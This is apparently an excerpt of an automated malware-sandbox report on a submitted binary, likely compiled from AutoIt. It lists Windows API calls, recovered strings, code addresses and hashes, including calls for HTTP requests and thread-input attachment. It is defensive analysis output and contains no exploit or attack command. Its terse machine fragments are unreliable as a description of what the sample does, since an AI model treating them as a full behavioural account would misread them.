                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID$p#^
                                                • API String ID: 1924731296-4032057566
                                                • Opcode ID: 9b6791fda17731ee25574be3e890b70120333fdb9b620b123835f6352c847ba5
                                                • Instruction ID: d65b7d930107cc718ae49dd7914e4df3004e74037b0c6302dae5329496e7391d
                                                • Opcode Fuzzy Hash: 9b6791fda17731ee25574be3e890b70120333fdb9b620b123835f6352c847ba5
                                                • Instruction Fuzzy Hash: 9A518D70104345AFE714DF14DCA9BAE7BE4FB89714F000529F9929B2E2DB709D48CB62
                                                APIs
                                                • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 005833CF
                                                  • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 005833F0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: LoadString$_wcslen
                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                • API String ID: 4099089115-3080491070
                                                • Opcode ID: 2c5b753b663f0a139c51f28c0c28e159c0975d32c3bfecdbbcecb43d0f98862c
                                                • Instruction ID: b97928cbf6668750fe2cbab7faf2d9bd8b255a27dcb82d62a7769dcb87649bd9
                                                • Opcode Fuzzy Hash: 2c5b753b663f0a139c51f28c0c28e159c0975d32c3bfecdbbcecb43d0f98862c
                                                • Instruction Fuzzy Hash: EE51B37180020ABAEF15EBA0DD5AEEEBF78BF54740F104466F50572161EB312F98DB60
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: _wcslen$BuffCharUpper
                                                • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                • API String ID: 1256254125-769500911
                                                • Opcode ID: 6c34b784d65c3a51936ad62e978f5782042e8d66e6090e8b84198591dbbcaad6
                                                • Instruction ID: 9d3d8b958fce7c9f6bb1e33cf411d7d3e757fb5e8f625136b9ba80c7532fa462
                                                • Opcode Fuzzy Hash: 6c34b784d65c3a51936ad62e978f5782042e8d66e6090e8b84198591dbbcaad6
                                                • Instruction Fuzzy Hash: 2C41FD72A000279BDB205F7DD8906BE7FB5FFA0754B24812AE629D7284E735CD81D790
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 005853A0
                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00585416
                                                • GetLastError.KERNEL32 ref: 00585420
                                                • SetErrorMode.KERNEL32(00000000,READY), ref: 005854A7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                • API String ID: 4194297153-14809454
                                                • Opcode ID: 4ac313710d03adff532ea9e41e96507077347536d5ad7b03e5072371345dc921
                                                • Instruction ID: bbbc0acc88e2e69d1789eae54116aef7bc10f5fac25d6c84168142adee5899ab
                                                • Opcode Fuzzy Hash: 4ac313710d03adff532ea9e41e96507077347536d5ad7b03e5072371345dc921
                                                • Instruction Fuzzy Hash: B4318F35A006059FDB10EF68C488AAA7FF4FF45305F548066E805EB3A2EB71DD86CB90
                                                APIs
                                                • CreateMenu.USER32 ref: 005A3C79
                                                • SetMenu.USER32(?,00000000), ref: 005A3C88
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005A3D10
                                                • IsMenu.USER32(?), ref: 005A3D24
                                                • CreatePopupMenu.USER32 ref: 005A3D2E
                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 005A3D5B
                                                • DrawMenuBar.USER32 ref: 005A3D63
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                • String ID: 0$F
                                                • API String ID: 161812096-3044882817
                                                • Opcode ID: 0d2f37f1e57237b641743da74e3f7dc7c0f261496fcb4c8271f0836d73c1a862
                                                • Instruction ID: 27a32d64678b2d3c73eb1829b21462897e1da032068909cd2280e2de5c407997
                                                • Opcode Fuzzy Hash: 0d2f37f1e57237b641743da74e3f7dc7c0f261496fcb4c8271f0836d73c1a862
                                                • Instruction Fuzzy Hash: 18416879A01209EFDB14CF64D884AAE7FB5FF5A354F140029F946A7360D730AA14DB94
                                                APIs
                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 005A3A9D
                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 005A3AA0
                                                • GetWindowLongW.USER32(?,000000F0), ref: 005A3AC7
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 005A3AEA
                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 005A3B62
                                                • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 005A3BAC
                                                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 005A3BC7
                                                • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 005A3BE2
                                                • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 005A3BF6
                                                • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 005A3C13
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: MessageSend$LongWindow
                                                • String ID:
                                                • API String ID: 312131281-0
                                                • Opcode ID: 6a121adec603426d56cb2149658e46ed74cc961d9af572a72530947eae12d603
                                                • Instruction ID: 54982ee2cc5b44355717b08d8d85a7a00505cbc00a454a5e6c79052ab5caf453
                                                • Opcode Fuzzy Hash: 6a121adec603426d56cb2149658e46ed74cc961d9af572a72530947eae12d603
                                                • Instruction Fuzzy Hash: D5615975900248AFDB10DFA8CC81EEE7BF8BF4A714F100099FA15AB291C770AE45DB60
                                                APIs
                                                • GetCurrentThreadId.KERNEL32 ref: 0057B151
                                                • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0057A1E1,?,00000001), ref: 0057B165
                                                • GetWindowThreadProcessId.USER32(00000000), ref: 0057B16C
                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0057A1E1,?,00000001), ref: 0057B17B
                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0057B18D
                                                • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0057A1E1,?,00000001), ref: 0057B1A6
                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0057A1E1,?,00000001), ref: 0057B1B8
                                                • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0057A1E1,?,00000001), ref: 0057B1FD
                                                • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0057A1E1,?,00000001), ref: 0057B212
                                                • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0057A1E1,?,00000001), ref: 0057B21D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                • String ID:
                                                • API String ID: 2156557900-0
                                                • Opcode ID: 15b1861ebdf8dcdd26e909d5e305a6190dc6f59cde9608180d4cd08a9552c0f0
                                                • Instruction ID: a050517342d5caed08633f028526d7c7b1b44c480fee28fff55d126ac75abfec
                                                • Opcode Fuzzy Hash: 15b1861ebdf8dcdd26e909d5e305a6190dc6f59cde9608180d4cd08a9552c0f0
                                                • Instruction Fuzzy Hash: 72318C75510208AFEB149F24EC8CB6D7FA9BB61311F108455FA09DB191E7B49E48AF60
                                                APIs
                                                • _free.LIBCMT ref: 00542C94
                                                  • Part of subcall function 005429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000), ref: 005429DE
                                                  • Part of subcall function 005429C8: GetLastError.KERNEL32(00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000,00000000), ref: 005429F0
                                                • _free.LIBCMT ref: 00542CA0
                                                • _free.LIBCMT ref: 00542CAB
                                                • _free.LIBCMT ref: 00542CB6
                                                • _free.LIBCMT ref: 00542CC1
                                                • _free.LIBCMT ref: 00542CCC
                                                • _free.LIBCMT ref: 00542CD7
                                                • _free.LIBCMT ref: 00542CE2
                                                • _free.LIBCMT ref: 00542CED
                                                • _free.LIBCMT ref: 00542CFB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: cb3ab96e268b8459a62f3b421e9f9936c1086efe2ad853fe3524ff0753285d84
                                                • Instruction ID: f2b647019b5027eac990fe8d3f060b4f816d861e06b3150a55d4c80a2b105c10
                                                • Opcode Fuzzy Hash: cb3ab96e268b8459a62f3b421e9f9936c1086efe2ad853fe3524ff0753285d84
                                                • Instruction Fuzzy Hash: DF11C076100119AFDB02EF95D886CDD3FB9FF45354F9144A0FA489B222DA31EE909B90
                                                APIs
                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00511459
                                                • OleUninitialize.OLE32(?,00000000), ref: 005114F8
                                                • UnregisterHotKey.USER32(?), ref: 005116DD
                                                • DestroyWindow.USER32(?), ref: 005524B9
                                                • FreeLibrary.KERNEL32(?), ref: 0055251E
                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0055254B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                • String ID: close all
                                                • API String ID: 469580280-3243417748
                                                • Opcode ID: 10d15447c7f98f54702417cc64a86ce5e6c53b4398fd31a80765e62a8daaaad7
                                                • Instruction ID: 6868d8ac1e200b6f10c86dff4f2ce615e05f25ca166e739ad64f0d328634d7ee
                                                • Opcode Fuzzy Hash: 10d15447c7f98f54702417cc64a86ce5e6c53b4398fd31a80765e62a8daaaad7
                                                • Instruction Fuzzy Hash: 4AD1BD31701622CFEB19EF14D4A8A69FFA4BF46700F1441EEE94A6B252DB30AC56CF54
                                                APIs
                                                • SetWindowLongW.USER32(?,000000EB), ref: 00515C7A
                                                  • Part of subcall function 00515D0A: GetClientRect.USER32(?,?), ref: 00515D30
                                                  • Part of subcall function 00515D0A: GetWindowRect.USER32(?,?), ref: 00515D71
                                                  • Part of subcall function 00515D0A: ScreenToClient.USER32(?,?), ref: 00515D99
                                                • GetDC.USER32 ref: 005546F5
                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00554708
                                                • SelectObject.GDI32(00000000,00000000), ref: 00554716
                                                • SelectObject.GDI32(00000000,00000000), ref: 0055472B
                                                • ReleaseDC.USER32(?,00000000), ref: 00554733
                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 005547C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                • String ID: U
                                                • API String ID: 4009187628-3372436214
                                                • Opcode ID: 606f041d2381b20eb5b647d1b542239d452e97a4a0ec60724ef10875ce4f5126
                                                • Instruction ID: 6a7442baf897b7f100ead10c7b58d3ad4d9cbc5dbde225e092372e4ab66aa7f3
                                                • Opcode Fuzzy Hash: 606f041d2381b20eb5b647d1b542239d452e97a4a0ec60724ef10875ce4f5126
                                                • Instruction Fuzzy Hash: 1671DF34400205DFCF258F64C998AEA3FB5FF8A31AF14426AED555A266D7309CCADF50
                                                APIs
                                                • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 005835E4
                                                  • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                • LoadStringW.USER32(005E2390,?,00000FFF,?), ref: 0058360A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: LoadString$_wcslen
                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                • API String ID: 4099089115-2391861430
                                                • Opcode ID: f740b3057fc6fac08b1663d068b5317b56afb3e53c0ca98e25f1983bee0a3a34
                                                • Instruction ID: 01a258eaff1156b73ec1966dd901fbecae17bf0f3fcd8015bee7ecbafa8b6670
                                                • Opcode Fuzzy Hash: f740b3057fc6fac08b1663d068b5317b56afb3e53c0ca98e25f1983bee0a3a34
                                                • Instruction Fuzzy Hash: 0C516B7180020ABAEF14EBA0DC9AEEDBF38FF54700F144525F515721A1EB306B99DBA0
                                                APIs
                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0058C272
                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0058C29A
                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0058C2CA
                                                • GetLastError.KERNEL32 ref: 0058C322
                                                • SetEvent.KERNEL32(?), ref: 0058C336
                                                • InternetCloseHandle.WININET(00000000), ref: 0058C341
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                • String ID:
                                                • API String ID: 3113390036-3916222277
                                                • Opcode ID: 98d7d3055c148619287e8690006587210a279fd393ab516df3775419a9338fdd
                                                • Instruction ID: 7790a83be29ec81c6077cf97ffaada539440bc72bc764fc059f9443af2f9ae57
                                                • Opcode Fuzzy Hash: 98d7d3055c148619287e8690006587210a279fd393ab516df3775419a9338fdd
                                                • Instruction Fuzzy Hash: 64317FB1500604AFD721AF649C88AAB7FFCFB59744F10891EF886A2240DB34DD099B70
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00553AAF,?,?,Bad directive syntax error,005ACC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 005798BC
                                                • LoadStringW.USER32(00000000,?,00553AAF,?), ref: 005798C3
                                                  • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00579987
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: HandleLoadMessageModuleString_wcslen
                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                • API String ID: 858772685-4153970271
                                                • Opcode ID: cf11680bd29c287107490eb45fe4780d5aca51db3f22cd620debb7e661b1d1b6
                                                • Instruction ID: 3543e181bf1943ab2dec9d3879c9b890ed7313b46a79ed3319eb8e9b89e6397c
                                                • Opcode Fuzzy Hash: cf11680bd29c287107490eb45fe4780d5aca51db3f22cd620debb7e661b1d1b6
                                                • Instruction Fuzzy Hash: 3D21943180021BBBDF11AF90DC5AEED7F75FF54300F044826F519620A1EB71AA58EB60
                                                APIs
                                                • GetParent.USER32 ref: 005720AB
                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 005720C0
                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0057214D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ClassMessageNameParentSend
                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                • API String ID: 1290815626-3381328864
                                                • Opcode ID: e8a184e5a12ad1e1daeace80f8dfb6591ca979f161a6249e322417ef7e8af23c
                                                • Instruction ID: e24e2ee8d6ef4f15f5b1a9a8917e5d0e8b7af0ecbfbba80c76c1da46cb71f507
                                                • Opcode Fuzzy Hash: e8a184e5a12ad1e1daeace80f8dfb6591ca979f161a6249e322417ef7e8af23c
                                                • Instruction Fuzzy Hash: 9C11597A288307BAF6116229FC0BDA63F9CFB15324F20401BFB09A50D1FE716841BA14
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                • String ID:
                                                • API String ID: 1282221369-0
                                                • Opcode ID: 35c5133244bc30a076be77cc1833b6e730a0e82258f093994e484aa6b43f7f69
                                                • Instruction ID: 0c4c8da63d30988a50988f37c33bf85e18892c3feaad86dce66b3f4f2a063d49
                                                • Opcode Fuzzy Hash: 35c5133244bc30a076be77cc1833b6e730a0e82258f093994e484aa6b43f7f69
                                                • Instruction Fuzzy Hash: FF618771905312BFDB25AFB49C89AEE7FA5FF81318F04016DF9449B282EB359C489760
                                                APIs
                                                • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00566890
                                                • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 005668A9
                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 005668B9
                                                • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 005668D1
                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 005668F2
                                                • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00528874,00000000,00000000,00000000,000000FF,00000000), ref: 00566901
                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0056691E
                                                • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00528874,00000000,00000000,00000000,000000FF,00000000), ref: 0056692D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                • String ID:
                                                • API String ID: 1268354404-0
                                                • Opcode ID: 66e45f2eea7abb2dca242a926c55c8933cb1b674fe93f8eb8f41bae400671fa7
                                                • Instruction ID: 5e0b6f25aa68993db56f952f6c905eec3b766dfcd013a009b4c7cdb023e2328e
                                                • Opcode Fuzzy Hash: 66e45f2eea7abb2dca242a926c55c8933cb1b674fe93f8eb8f41bae400671fa7
